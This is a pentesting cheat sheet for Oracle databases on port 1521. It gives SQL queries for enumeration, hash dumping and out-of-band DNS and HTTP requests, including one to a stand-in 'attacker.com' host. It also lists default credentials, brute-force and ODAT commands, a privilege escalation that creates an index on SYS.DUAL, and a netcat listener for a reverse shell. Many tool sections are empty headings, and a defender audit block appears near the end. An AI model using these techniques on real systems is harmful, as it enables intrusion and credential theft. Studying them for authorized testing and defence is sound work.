1521 - Oracle DB

Oracle Database is a multi-model database management system produced and marketed by Oracle Corporation.

Port: 1521

Commands

Check privileges:

select * from user_role_privs;

Type

Command

Version

SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
SELECT version FROM v$instance;

Comments

SELECT 1 FROM dual -- comment
NB: SELECT statements must have a FROM clause in Oracle, so we have to use the dummy table name 'dual' when we're not actually selecting from a table.

Current User

SELECT user FROM dual

List Users

SELECT username FROM all_users ORDER BY username;
SELECT name FROM sys.user$; -- priv

List Password Hashes

SELECT name, password, astatus FROM sys.user$; -- priv, <= 10g. astatus tells you if the account is locked
SELECT name, spare4 FROM sys.user$; -- priv, 11g

Password Cracker

checkpwd will crack the DES-based hashes from Oracle 8, 9 and 10.

List Privileges

SELECT * FROM session_privs; -- current privs
SELECT * FROM dba_sys_privs WHERE grantee = 'DBSNMP'; -- priv, list a user's privs
SELECT grantee FROM dba_sys_privs WHERE privilege = 'SELECT ANY DICTIONARY'; -- priv, find users with a particular priv
SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;

List DBA Accounts

SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES'; -- priv, list DBAs, DBA roles

Current Database

SELECT global_name FROM global_name;
SELECT name FROM v$database;
SELECT instance_name FROM v$instance;
SELECT SYS.DATABASE_NAME FROM DUAL;

List Databases

SELECT DISTINCT owner FROM all_tables; -- list schemas (one per user)
Also query the TNS listener for other databases. See tnscmd (services | status).

List Columns

SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' AND owner = 'foo';

List Tables

SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;

Find Tables From Column Name

SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%'; -- NB: table names are upper case

Select Nth Row

SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; -- gets 9th row (rows numbered from 1)

Select Nth Char

SELECT substr('abcd', 3, 1) FROM dual; -- gets 3rd character, 'c'

Bitwise AND

SELECT bitand(6,2) FROM dual; -- returns 2
SELECT bitand(6,1) FROM dual; -- returns 0

ASCII Value -> Char

SELECT chr(65) FROM dual; -- returns A

Char -> ASCII Value

SELECT ascii('A') FROM dual; -- returns 65

Casting

SELECT CAST(1 AS char) FROM dual;
SELECT CAST('1' AS int) FROM dual;

String Concatenation

SELECT 'A' || 'B' FROM dual; -- returns AB

If Statement

BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; -- doesn't play well with SELECT statements

Case Statement

SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; -- returns 1
SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; -- returns 2

Avoiding Quotes

SELECT chr(65) || chr(66) FROM dual; -- returns AB

Time Delay

BEGIN DBMS_LOCK.SLEEP(5); END; -- priv, can't seem to embed this in a SELECT
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- if reverse lookups are slow
SELECT UTL_INADDR.get_host_address('blah.attacker.com') FROM dual; -- if forward lookups are slow
SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual; -- if outbound TCP is filtered / slow
Also see Heavy Queries to create a time delay.

Make DNS Requests

SELECT UTL_INADDR.get_host_address('google.com') FROM dual;
SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual;

Command Execution

Java can be used to execute commands if it's installed. ExtProc can sometimes be used too, though it normally failed for me. :-(

Local File Access

UTL_FILE can sometimes be used. Check that the following is non-null:
SELECT value FROM v$parameter2 WHERE name = 'utl_file_dir';
Java can be used to read and write files if it's installed (it is not available in Oracle Express).

Hostname, IP Address

SELECT UTL_INADDR.get_host_name FROM dual;
SELECT host_name FROM v$instance;
SELECT UTL_INADDR.get_host_address FROM dual; -- gets IP address
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- gets hostnames

Location of DB files

SELECT name FROM V$DATAFILE;

Default/System Databases

SYSTEM
SYSAUX


Enumeration

oscanner

Install oscanner:

apt-get install oscanner

Run oscanner:

oscanner -s 192.168.1.200 -P 1521

tnscmd10g

Fingerprint Oracle TNS Version

Fingerprint Oracle TNS:

tnscmd10g version -h TARGET

Nmap

Run nmap scripts against Oracle TNS:

nmap -p 1521 -A TARGET

Find tns version:

nmap --script=oracle-tns-version -p 1521 TARGET

Brute force oracle user accounts

Identify default Oracle databases:

brute force users using the SID:

nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL <host>

or

ODAT

https://github.com/quentinhardy/odat

ODAT (Oracle Database Attacking Tool) is an open source penetration testing tool that tests the security of Oracle Databases remotely.

Usage examples of ODAT:

  • You have an Oracle database listening remotely and want to find valid SIDs and credentials in order to connect to the database

  • You have a valid Oracle account on a database and want to escalate your privileges to become DBA or SYSDBA

  • You have an Oracle account and you want to execute system commands (e.g. reverse shell) in order to move forward on the operating system hosting the database

Tested on Oracle Database 10g, 11g, 12c and 18c.

Install: download the latest release from the github repo

Examples:

Identify SIDs

identify users:

use the wordlist below for just the default accounts

find vulnerable modules:

Upload shell

Get files

Metasploit

sid bruteforce:

tns version:

sid enum:

username enumeration:

index priv esc:

execute sql queries:

enumerate the database:

Hydra

brute-force the listener password if one exists:

Default accounts

Username      Password
SYSTEM        MANAGER
SYS           CHANGE_ON_INSTALL
DBSNMP        DBSNMP
SCOTT         TIGER
PCMS_SYS      PCMS_SYS
WMSYS         WMSYS
OUTLN         OUTLN

Try lowercase as well

wordlist:

Connecting to Oracle DB

To interact with Oracle from our Kali box, there are three tools that can come in handy. sqlplus is required for odat to work properly:

Sqlplus will be installed with odat. So just install odat (apt install odat)

Connect as normal user:

Connect as sysdba:

Privilege escalation

Can also do the Metasploit module

Oracle priv esc and obtain DBA access:

Run netcat: netcat -nvlp 443

SQL> create index exploit_1337 on SYS.DUAL(SCOTT.GETDBA('BAR'));

Run the exploit with a select query:

SQL> Select * from session_privs;

Remove the exploit using:

drop index exploit_1337;
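As an added defender-side check (not part of the original page), the following audit queries let a DBA find the exposures that the default-account list and the index privilege escalation above depend on. They assume a privileged account in sqlplus and, for the first query, Oracle 11g or later, where the DBA_USERS_WITH_DEFPWD view exists.

```sql
-- Added audit queries (not from the original page). Run as a DBA in sqlplus.

-- 1. Accounts that still carry an Oracle-supplied default password and are not locked.
--    DBA_USERS_WITH_DEFPWD exists from 11g onward (assumption: that release or later).
SELECT u.username, u.account_status, u.profile
FROM   dba_users u
JOIN   dba_users_with_defpwd d ON d.username = u.username
WHERE  u.account_status NOT LIKE '%LOCKED%'
ORDER  BY u.username;

-- 2. Grants of the system privileges the notes above rely on: SELECT ANY DICTIONARY
--    exposes the hashes in sys.user$, CREATE ANY INDEX is what the function-based
--    index on SYS.DUAL needs.
SELECT grantee, privilege, admin_option
FROM   dba_sys_privs
WHERE  privilege IN ('SELECT ANY DICTIONARY', 'CREATE ANY INDEX')
AND    grantee NOT IN ('SYS', 'SYSTEM', 'DBA')
ORDER  BY privilege, grantee;

-- 3. Packages used for DNS requests, time delays and file access that PUBLIC can
--    still execute; revoking them from PUBLIC removes the out-of-band channels.
SELECT grantee, owner, table_name, privilege
FROM   dba_tab_privs
WHERE  grantee = 'PUBLIC'
AND    owner = 'SYS'
AND    table_name IN ('UTL_INADDR', 'UTL_HTTP', 'UTL_FILE', 'DBMS_LOCK')
ORDER  BY table_name;

-- 4. The utl_file_dir parameter from "Local File Access": a non-null value (or '*')
--    means UTL_FILE can reach directories on the database host.
SELECT name, value
FROM   v$parameter2
WHERE  name = 'utl_file_dir';
```

Any row returned by the first three queries is a finding to lock, reset or revoke; an empty result for all four is the expected state on a hardened instance.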

ODAT

reverse shell #1

If you're trying to do this with sqlplus you need to put a / at the end to complete the operation.

reverse shell #1

Resources:

https://medium.com/@netscylla/oracle-hacks-part-2-b1ccb1916d1f
